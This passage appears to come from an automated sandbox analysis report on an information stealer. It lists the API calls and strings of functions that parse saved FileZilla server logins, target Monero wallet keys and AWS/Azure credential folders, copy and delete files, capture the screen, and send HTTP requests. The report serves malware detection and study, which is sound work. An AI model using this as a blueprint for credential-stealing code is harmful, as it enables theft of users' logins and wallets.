                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00380DBF,00380DBE,00380DBB,00380DBA), ref: 003704C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003704C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 003704E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003704F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0037052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 0037053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00370579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003705C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003705D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 0037067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003706AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003706C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 003706D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 003706E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 003706F3
                                    • lstrcat.KERNEL32(?,00381770), ref: 00370702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370715
                                    • lstrcat.KERNEL32(?,00381774), ref: 00370724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00370733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370746
                                    • lstrcat.KERNEL32(?,00381780), ref: 00370755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00370764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370777
                                    • lstrcat.KERNEL32(?,00381790), ref: 00370786
                                    • lstrcat.KERNEL32(?,00381794), ref: 00370795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003707EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: c8f2601faca533b813ba86069b72163623c5fb4d9bddaeef8f67d979da380f02
                                    • Instruction ID: e6d03875127615cab2610f2dbbdb047d6c45192e2965003e5cafc0fddf035ed2
                                    • Opcode Fuzzy Hash: c8f2601faca533b813ba86069b72163623c5fb4d9bddaeef8f67d979da380f02
                                    • Instruction Fuzzy Hash: 09D13272910208ABCB25FBF0DD56EEE777DAF54300F50C558F106AA091EF38AA09CB61
                                    Function 003659B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00365A48
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00365A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00365BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F3E570,00000000,?,00F39D68,00000000,?,00381B4C), ref: 00365EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00365ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00365EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00365EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00365EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00365F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00365F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00365F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00365F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00365F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00366000
                                    • InternetCloseHandle.WININET(00000000), ref: 0036600D
                                    • HttpOpenRequestA.WININET(00000000,00F3E500,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 00365C48
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00366017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 984533c499c5d8607bb40ebcd4c268ecb2cda1f3c1f665065bf1b85a05afc8d8
                                    • Instruction ID: 08928fcb8721ae572b178ea62db00f110a77acaa4e4ca466f634b2ecbc6586e9
                                    • Opcode Fuzzy Hash: 984533c499c5d8607bb40ebcd4c268ecb2cda1f3c1f665065bf1b85a05afc8d8
                                    • Instruction Fuzzy Hash: AE12F272920518ABCB26EBA0DCA5FEEB379BF54700F1081D9F10A66091EF746B48CF55
                                    Function 0036CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0036D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D308
                                    • lstrcat.KERNEL32(?,00381570), ref: 0036D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D32A
                                    • lstrcat.KERNEL32(?,00381574), ref: 0036D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D34C
                                    • lstrcat.KERNEL32(?,00381578), ref: 0036D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D36E
                                    • lstrcat.KERNEL32(?,0038157C), ref: 0036D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D390
                                    • lstrcat.KERNEL32(?,00381580), ref: 0036D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D3B2
                                    • lstrcat.KERNEL32(?,00381584), ref: 0036D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D3D4
                                    • lstrcat.KERNEL32(?,00381588), ref: 0036D3E3
                                      • Part of subcall function 0037AB30: lstrlen.KERNEL32(00364F55,?,?,00364F55,00380DDF), ref: 0037AB3B
                                      • Part of subcall function 0037AB30: lstrcpy.KERNEL32(00380DDF,00000000), ref: 0037AB95
                                    • lstrlen.KERNEL32(?), ref: 0036D42A
                                    • lstrlen.KERNEL32(?), ref: 0036D439
                                      • Part of subcall function 0037AD80: StrCmpCA.SHLWAPI(00000000,00381568,0036D2A2,00381568,00000000), ref: 0037AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: fa8f98707126d73d244be87b74887754803385ae1c870d92e443747a8cc2de78
                                    • Instruction ID: c5a653d3893ac07a97d5f9e40e5694a71845a17e2604aa9fdb301500c0dc19da
                                    • Opcode Fuzzy Hash: fa8f98707126d73d244be87b74887754803385ae1c870d92e443747a8cc2de78
                                    • Instruction Fuzzy Hash: 99E12671910508ABCB26FBA0DDA6EEE737DAF54301F108554F50B7A0A1DF35AE04CB61
                                    Function 0036CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F3CE38,00000000,?,00381544,00000000,?,?), ref: 0036CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0036CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0036CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0036CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0036CBD9
                                    • StrStrA.SHLWAPI(?,00F3CDF0,00380B56), ref: 0036CBF7
                                    • StrStrA.SHLWAPI(00000000,00F3CE08), ref: 0036CC1E
                                    • StrStrA.SHLWAPI(?,00F3D658,00000000,?,00381550,00000000,?,00000000,00000000,?,00F38AF0,00000000,?,0038154C,00000000,?), ref: 0036CDA2
                                    • StrStrA.SHLWAPI(00000000,00F3D758), ref: 0036CDB9
                                      • Part of subcall function 0036C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C971
                                      • Part of subcall function 0036C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C97C
                                    • StrStrA.SHLWAPI(?,00F3D758,00000000,?,00381554,00000000,?,00000000,00F38B70), ref: 0036CE5A
                                    • StrStrA.SHLWAPI(00000000,00F388B0), ref: 0036CE71
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B47), ref: 0036CA43
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B4B), ref: 0036CA57
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B4E), ref: 0036CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0036CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0036CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 7b437eb3b637c4291259486a3ebace2b1414fed61957fc71aa1ba0e545ab24b3
                                    • Instruction ID: de0b577b1f1098db1c77d5fa99b1a99a7ac9a2129c4e681b1c028f9476cb921a
                                    • Opcode Fuzzy Hash: 7b437eb3b637c4291259486a3ebace2b1414fed61957fc71aa1ba0e545ab24b3
                                    • Instruction Fuzzy Hash: C0E10571910508ABDB26EBA4DCA1FEEB779AF54300F108199F10BBB191DF346A49CF61
                                    Function 003784B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,00F3AB40,00000000,00020019,00000000,003805BE), ref: 00378534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003785B6
                                    • wsprintfA.USER32 ref: 003785E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0037860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0037861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378629
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 743fd52228a808cda45621fabd2531495236aba74221e0b22091e1e1c0c550f0
                                    • Instruction ID: 8ce445f1691282d7021c6d00959d2b6950d1a37a3119d546a89d8c00a12c3011
                                    • Opcode Fuzzy Hash: 743fd52228a808cda45621fabd2531495236aba74221e0b22091e1e1c0c550f0
                                    • Instruction Fuzzy Hash: 5681EBB1911118ABDB69DB54CD95FEE77B9BF48700F10C2D8E10AA6140DF74AB89CFA0
                                    Function 003791A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003791FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: `d7F$`d7F$image/jpeg
                                    • API String ID: 2244384528-1338777330
                                    • Opcode ID: b8afddf818884ab411149deededbaab5dba580461cdc40e3e5363380fdc74c04
                                    • Instruction ID: a047aca9c2ee025d763bee2cf8a2016c42dd194846f776d76e8fe9dd984a7292
                                    • Opcode Fuzzy Hash: b8afddf818884ab411149deededbaab5dba580461cdc40e3e5363380fdc74c04
                                    • Instruction Fuzzy Hash: 7071EFB5910208ABDB24DFE4DC85FEEB7B9BF48700F148519F516AB294DB74A904CBA0
                                    Function 00374FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00375000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 0037501D
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374B7C
                                      • Part of subcall function 00374B60: FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 0037508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 003750A9
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                      • Part of subcall function 00374B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                      • Part of subcall function 00374B60: FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00375118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00375135
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374C00
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,003808D3), ref: 00374C15
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374C32
                                      • Part of subcall function 00374B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00374C6E
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00F3E530), ref: 00374C9A
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00380FE0), ref: 00374CAC
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,?), ref: 00374CC0
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00380FE4), ref: 00374CD2
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,?), ref: 00374CE6
